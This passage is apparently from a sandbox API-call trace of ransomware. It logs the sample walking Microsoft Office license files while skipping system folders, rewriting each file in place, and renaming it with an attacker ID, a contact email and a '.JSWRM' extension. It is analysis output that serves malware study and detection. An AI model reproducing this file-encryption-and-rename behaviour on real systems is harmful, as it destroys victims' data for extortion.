[0103.371] CloseHandle (hObject=0x45c) returned 1 [0103.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0103.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0103.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0103.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0103.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0103.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0103.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23fa98 [0103.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0103.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.371] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp4-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp4-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp4-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp4-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0103.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0103.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0103.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0103.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.372] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe40e7dfb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe40e7dfb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe41f2eb7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x299f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_Retail-pl.xrm-ms", cAlternateFileName="HO6958~1.XRM")) returned 1 [0103.372] lstrcmpiW (lpString1="HomeBusinessR_Retail-pl.xrm-ms", lpString2=".") returned 1 [0103.372] lstrcmpiW (lpString1="HomeBusinessR_Retail-pl.xrm-ms", lpString2="..") returned 1 [0103.372] lstrcmpiW (lpString1="HomeBusinessR_Retail-pl.xrm-ms", lpString2="...") returned 1 [0103.372] lstrcmpiW (lpString1="HomeBusinessR_Retail-pl.xrm-ms", lpString2="windows") returned -1 [0103.372] lstrcmpiW (lpString1="HomeBusinessR_Retail-pl.xrm-ms", lpString2="recovery") returned -1 [0103.372] lstrcmpiW (lpString1="HomeBusinessR_Retail-pl.xrm-ms", lpString2="perflogs") returned -1 [0103.372] lstrcmpiW (lpString1="HomeBusinessR_Retail-pl.xrm-ms", lpString2="documents and settings") returned 1 [0103.372] lstrcmpiW (lpString1="HomeBusinessR_Retail-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.372] lstrcmpiW (lpString1="HomeBusinessR_Retail-pl.xrm-ms", lpString2="system volume information") returned -1 [0103.373] lstrcmpiW (lpString1="HomeBusinessR_Retail-pl.xrm-ms", lpString2="msocache") returned -1 [0103.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0103.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0103.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0103.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x2410d8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0103.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0103.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0103.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0103.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0103.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241268, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0103.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0103.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0103.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0103.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0103.373] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.373] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10655) returned 1 [0103.374] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2990) returned 0x24c1d0 [0103.374] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2990, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2990, lpOverlapped=0x0) returned 1 [0103.377] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.377] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2990, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2990, lpOverlapped=0x0) returned 1 [0103.377] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.377] CloseHandle (hObject=0x45c) returned 1 [0103.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0103.377] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.377] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0103.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.378] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0103.378] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0103.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0103.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0103.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0103.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0103.378] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0103.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0103.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0103.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0103.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0103.379] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe4180773, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe4180773, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe426559f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x564b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_Retail-ppd.xrm-ms", cAlternateFileName="HOB1F6~1.XRM")) returned 1 [0103.379] lstrcmpiW (lpString1="HomeBusinessR_Retail-ppd.xrm-ms", lpString2=".") returned 1 [0103.379] lstrcmpiW (lpString1="HomeBusinessR_Retail-ppd.xrm-ms", lpString2="..") returned 1 [0103.379] lstrcmpiW (lpString1="HomeBusinessR_Retail-ppd.xrm-ms", lpString2="...") returned 1 [0103.379] lstrcmpiW (lpString1="HomeBusinessR_Retail-ppd.xrm-ms", lpString2="windows") returned -1 [0103.379] lstrcmpiW (lpString1="HomeBusinessR_Retail-ppd.xrm-ms", lpString2="recovery") returned -1 [0103.379] lstrcmpiW (lpString1="HomeBusinessR_Retail-ppd.xrm-ms", lpString2="perflogs") returned -1 [0103.379] lstrcmpiW (lpString1="HomeBusinessR_Retail-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0103.379] lstrcmpiW (lpString1="HomeBusinessR_Retail-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.379] lstrcmpiW (lpString1="HomeBusinessR_Retail-ppd.xrm-ms", lpString2="system volume information") returned -1 [0103.379] lstrcmpiW (lpString1="HomeBusinessR_Retail-ppd.xrm-ms", lpString2="msocache") returned -1 [0103.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0103.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0103.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0103.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x2413a8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0103.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0103.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0103.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0103.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0103.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x241290, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0103.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0103.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0103.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0103.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0103.380] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.380] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=22091) returned 1 [0103.380] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5640) returned 0x24c1d0 [0103.380] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5640, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5640, lpOverlapped=0x0) returned 1 [0103.383] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.383] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5640, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5640, lpOverlapped=0x0) returned 1 [0103.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.383] CloseHandle (hObject=0x45c) returned 1 [0103.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0103.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0103.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0103.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0103.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0103.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0103.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0103.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0103.384] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0103.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0103.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0103.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0103.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0103.385] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe404f4c8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe404f4c8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4134233, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d59, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_Retail-ul-oob.xrm-ms", cAlternateFileName="HOD57C~1.XRM")) returned 1 [0103.385] lstrcmpiW (lpString1="HomeBusinessR_Retail-ul-oob.xrm-ms", lpString2=".") returned 1 [0103.385] lstrcmpiW (lpString1="HomeBusinessR_Retail-ul-oob.xrm-ms", lpString2="..") returned 1 [0103.385] lstrcmpiW (lpString1="HomeBusinessR_Retail-ul-oob.xrm-ms", lpString2="...") returned 1 [0103.385] lstrcmpiW (lpString1="HomeBusinessR_Retail-ul-oob.xrm-ms", lpString2="windows") returned -1 [0103.385] lstrcmpiW (lpString1="HomeBusinessR_Retail-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0103.385] lstrcmpiW (lpString1="HomeBusinessR_Retail-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0103.385] lstrcmpiW (lpString1="HomeBusinessR_Retail-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0103.385] lstrcmpiW (lpString1="HomeBusinessR_Retail-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.385] lstrcmpiW (lpString1="HomeBusinessR_Retail-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0103.385] lstrcmpiW (lpString1="HomeBusinessR_Retail-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0103.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0103.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0103.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0103.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22ce70, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0103.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0103.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0103.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0103.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0103.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0103.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0103.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0103.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0103.385] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.386] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11609) returned 1 [0103.386] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.386] RtlAllocateHeap (HeapHandle=0x1e0000, 